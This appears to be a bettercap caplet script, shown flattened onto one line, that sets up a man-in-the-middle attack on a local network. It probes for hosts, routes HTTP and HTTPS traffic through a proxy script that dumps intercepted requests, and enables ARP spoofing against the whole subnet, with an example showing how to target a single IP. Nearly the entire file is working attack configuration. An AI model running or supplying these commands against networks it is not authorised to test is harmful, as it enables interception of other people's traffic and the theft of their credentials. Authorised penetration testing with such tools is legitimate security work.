# targeting the whole subnet by default, to make it selective: # # sudo ./bettercap-ng -caplet caplets/http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64" # to make it less verbose # events.stream off # discover a few hosts net.probe on sleep 1 net.probe off # uncomment to enable sniffing too # set net.sniff.verbose false # set net.sniff.local true # set net.sniff.filter tcp port 443 # net.sniff on # we'll use this proxy script to dump requests set https.proxy.script caplets/http-req-dump.js set http.proxy.script caplets/http-req-dump.js clear # go ^_^ http.proxy on https.proxy on arp.spoof on